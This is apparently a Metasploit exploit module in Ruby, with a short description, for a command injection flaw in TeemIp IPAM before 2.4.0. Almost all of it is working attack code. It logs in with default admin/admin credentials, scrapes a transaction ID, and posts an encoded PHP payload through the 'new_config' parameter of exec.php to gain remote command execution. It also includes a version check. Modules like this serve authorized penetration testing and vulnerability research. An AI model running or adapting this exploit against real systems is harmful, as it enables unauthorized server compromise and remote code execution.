This Metasploit module exploits a command injection vulnerability in TeemIp versions prior to 2.4.0. The "new_config" parameter of "exec.php" allows you to create a new PHP file with the exception of config information. The malicious PHP code sent is executed instantaneously and is not saved on the server. The vulnerability can be exploited by an authorized user (Administrator). Module allows remote command execution by sending php payload with parameter 'new_config'.
82ea7a04ea9f5af50f8fb97802e3ee4e
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection",
'Description' => %q(
This module exploits a command injection vulnerability in TeemIp
versions prior to 2.4.0. The "new_config" parameter of "exec.php"
allows you to create a new PHP file with the exception of config information.
The malicious PHP code sent is executed instantaneously and is not saved on the server.
The vulnerability can be exploited by an authorized user (Administrator).
Module allows remote command execution by sending php payload with parameter 'new_config'.
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
],
'References' =>
[
['URL', 'http://pentest.com.tr/exploits/TeemIp-IPAM-2-4-0-new-config-Command-Injection-Metasploit.html']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Apr 03 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base TeemIp IPAM directory path", '/6']),
OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
]
)
end
##
# Login and cookie information gathering
##
def do_login
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'pages', 'UI.php'),
'vars_post' => {
'auth_user' => datastore['username'],
'auth_pwd' => datastore['password'],
'loginop' => 'login'
}
)
unless res
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
if res.code == 200 && (res.body =~ /Logged in as/)
print_good("Authentication was successful")
@cookies = res.get_cookies
return
else
fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
end
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
##
# Exploitation process with prepared information
##
def exploit
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
@cookies = nil
do_login
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'pages', 'exec.php?exec_module=itop-config&exec_page=config.php&exec_env=production&c%5Bmenu%5D=ConfigEditor'),
'headers' => {
'Cookie' => @cookies
}
)
if res and res.code == 200 and res.body =~ /Identify yourself/
return do_login
else
transid = res.body.split('transaction_id" value="')[1].split('"')[0]
print_good("transaction_id : #{transid}")
end
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'pages', 'exec.php?exec_module=itop-config&exec_page=config.php&exec_env=production&c%5Bmenu%5D=ConfigEditor'),
'vars_post' => {
"operation" => "save",
"transaction_id" => transid,
"prev_config" => "exec",
"new_config" => payload.encoded
},
'headers' => {
'Cookie' => @cookies
}
)
handler
end
##
# Version and Vulnerability Check
##
def check
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'pages', 'ajax.render.php'),
'vars_post' => {
"operation" => "about_box"
}
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200
version = res.body.split('iTop version ')[1].split('" src=')[0]
if version < '2.4.1'
print_status("#{peer} - Teemip Version is #{version}")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
end
##
# End
##
end